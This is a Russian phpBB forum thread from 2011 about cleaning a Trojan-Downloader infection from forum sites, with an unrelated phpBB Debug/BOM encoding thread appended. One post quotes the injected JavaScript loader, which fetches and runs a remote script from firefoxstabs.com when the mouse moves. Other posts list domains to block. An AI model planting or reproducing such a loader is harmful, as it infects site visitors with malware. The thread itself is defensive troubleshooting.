Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 18 лет 7 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 16 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Поблагодарили: 26 раз

Re: Как убить Трояна?

Сообщение MIT »

Айдар
Смотри ванимательнее. С Гугла качается только jQuery, а вот что качается со второго сайта — очень интересно.

Добавлено спустя 17 минут 2 секунды:
Пока сайт распростанителей не попал в базу антивирусов, добавьте в фаерволл адреса:
firefoxstabs.com
ibankk.com
c9jv.co.cc
Аватара пользователя
kusto
phpBB 1.4.0
Сообщения: 36
Стаж: 14 лет 1 месяц
Откуда: Киев

Re: Как убить Трояна?

Сообщение kusto »

не знаю, сайты гугла, не гугла, но пока я его не вычистил из всех файлов, датирующихся 30 марта (именно с 30 марта начались проблемы), форум не начал корректно работать. Что харрактерно, на сайт этот код тоже "залез", пришлось вычищать его еще и с сайта. Сайт, правда работал без видимых каких-либо побочных еффектов, просто яндекс выдал в вебмастере, что на сайте присутствует вредоносный код. Такие вот дела. Еще раз спасибо вашему форуму за полезную информацию.
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 18 лет 2 месяца
Откуда: Калининград не Кенигсберг
Благодарил (а): 36 раз
Поблагодарили: 1526 раз

Re: Как убить Трояна?

Сообщение Sheer »

На Гугл, да, к библиотеке jQuery, а вот http://firefoxstabs.com подозрительно. Отправляет на порт 80, требует логин и пасс... Дальше я не полез... стремно.
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 16 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Поблагодарили: 26 раз

Re: Как убить Трояна?

Сообщение MIT »

Не лезь дальше. Там довольно серьёзная пакость лежит.
olibia
phpBB 1.0.0
Сообщения: 1
Стаж: 14 лет

Re: Как убить Трояна?

Сообщение olibia »

таже фигня...замучила совсем уже, раз в неделю кладет такую строчку

Код: Выделить всё

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>
на главную страницу вконце после тега ... меняла пароли, чистила комп, хостинг вроде вдоль и поперек проверили... где может лежать эта тварь?!!!
Последний раз редактировалось Айдар 07.04.2011 23:54, всего редактировалось 1 раз.
Причина: Не игнорируйте BBocde [code]
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 18 лет 2 месяца
Откуда: Калининград не Кенигсберг
Благодарил (а): 36 раз
Поблагодарили: 1526 раз

Re: Как убить Трояна?

Сообщение Sheer »

olibia писал(а):хостинг вроде вдоль и поперек проверили
Пусть проверят на наличие Blackhole Exploit Kit
VeroLom
phpBB 1.0.0
Сообщения: 2
Стаж: 13 лет 10 месяцев

Re: Как убить Трояна?

Сообщение VeroLom »

Нашёл более эффективный скрипт для лечения от этого вируса. Вылечил сайты на битриксе и UMI.
http://www.0xff.su/
force
phpBB 1.0.0
Сообщения: 1
Стаж: 14 лет

Re: Как убить Трояна?

Сообщение force »

не вводите людей в заблуждение. скрипт не лечит от вируса. он просто ищет файлы с вредоносным кодом и выкидывает код. но если комп заражен, то через день-два код пропишется снова в тех же файлах.
в настоящий момент сайт вирусописателя заблокирован, вирь ничего не прописывает. но как только будет запущен новый сайт с вирем, через те же дырки все повторится заново
VeroLom
phpBB 1.0.0
Сообщения: 2
Стаж: 13 лет 10 месяцев

Re: Как убить Трояна?

Сообщение VeroLom »

1. Качаете и запускаете из корня сайта скрипт с http://www.0xff.su/0x0005
2. Меняете все пароли
Аватара пользователя
Mileno4ka
phpBB 1.2.0
Сообщения: 14
Стаж: 14 лет 6 месяцев

Ошибка phpBB Debug

Сообщение Mileno4ka »

Доброго времени суток.
Помогите, пожалуйста, с проблемой.

Сегодня утром при заходе на форум : http://vertex-spb.ru/forum/ заметила 2 проблемы:

1. Шрифт стал огромным на странице
2. Строки ошибок в "шапке" страницы

см. Вложение 1

Никакие настройки не меняла.

При этом форум работал.

После обеда при попытки перейти с главной страницы форума на страницу ввода логина и пасса он начал выдавать тоже ошибку

см. Вложение 2

Таким образом: на форум не войти.

Первым делом оставила запрос Петерхосту:

От кого: Peterhost Support Team <support@peterhost.ru>
Дата: 8 августа 2011 г.

По поводу возникающей ошибки обратитесь, пожалуйста, к Вашему
веб-разработчику.
У вас нет необходимых прав для просмотра вложений в этом сообщении.
MAzZY
Бывший член :)
Сообщения: 2925
Стаж: 19 лет 11 месяцев
Благодарил (а): 19 раз
Поблагодарили: 30 раз
Забанен: Бессрочно

Re: Ошибка phpBB Debug

Сообщение MAzZY »

UTF-8 w/o BOM
Аватара пользователя
Mileno4ka
phpBB 1.2.0
Сообщения: 14
Стаж: 14 лет 6 месяцев

Re: Ошибка phpBB Debug

Сообщение Mileno4ka »

??? Непоняяятно (с) :)
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 18 лет 2 месяца
Откуда: Калининград не Кенигсберг
Благодарил (а): 36 раз
Поблагодарили: 1526 раз

Re: Ошибка phpBB Debug

Сообщение Sheer »

Mileno4ka
Пересохраните файлы index.php и config.php в кодировке UTF-8 без BOM
http://www.phpbbguru.net/community/sear ... %D0%B7+BOM
Изображение
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
Аватара пользователя
Пчелкин
phpBB 3.3.0
Сообщения: 11121
Стаж: 15 лет 3 месяца
Откуда: fotovideoforum.ru
Благодарил (а): 670 раз
Поблагодарили: 122 раза

Re: Ошибка phpBB Debug

Сообщение Пчелкин »

Mileno4ka писал(а):Никакие настройки не меняла.
Когда и где имеется ввиду..и при чем тут настройки...что делалось на фтпи?
Само все происходить не может...
NIKON-D90, AF-S 18-105, AF-S 14-24, AF-S 24-70
Аватара пользователя
Mileno4ka
phpBB 1.2.0
Сообщения: 14
Стаж: 14 лет 6 месяцев

Re: Ошибка phpBB Debug

Сообщение Mileno4ka »

В том то и дело, что вообще ничего не трогала. Пользовалась только как пользователь форумом. Даже в админку не заходила, не говоря уж об фтп.

Добавлено спустя 39 минут 50 секунд:
Преобразовала в UTF-8 без BOM в notepad++. заменила оригиналы. не помогло.

Вернуться в «phpBB-пространство»